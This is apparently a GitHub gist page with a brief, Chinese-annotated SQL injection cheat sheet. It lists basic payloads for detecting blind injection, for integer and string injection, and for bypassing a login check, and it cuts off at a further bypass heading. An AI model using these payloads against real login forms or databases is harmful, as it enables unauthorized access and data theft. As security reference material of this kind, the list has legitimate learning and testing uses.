Created
January 9, 2019 03:11
-
-
Save Xifeng2009/6b1092ae13d8c55e800a4943df76c4d3 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#1 判断盲注 | |
1 and 1=2 | |
1 and 1=1 | |
#2 整型注入 | |
1 or 1=1 # | |
#3 字符型注入 | |
1' or 1=1 # | |
#4 ByPass: 登陆验证 | |
x' or 1=1 # | |
#5 ByPass: |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment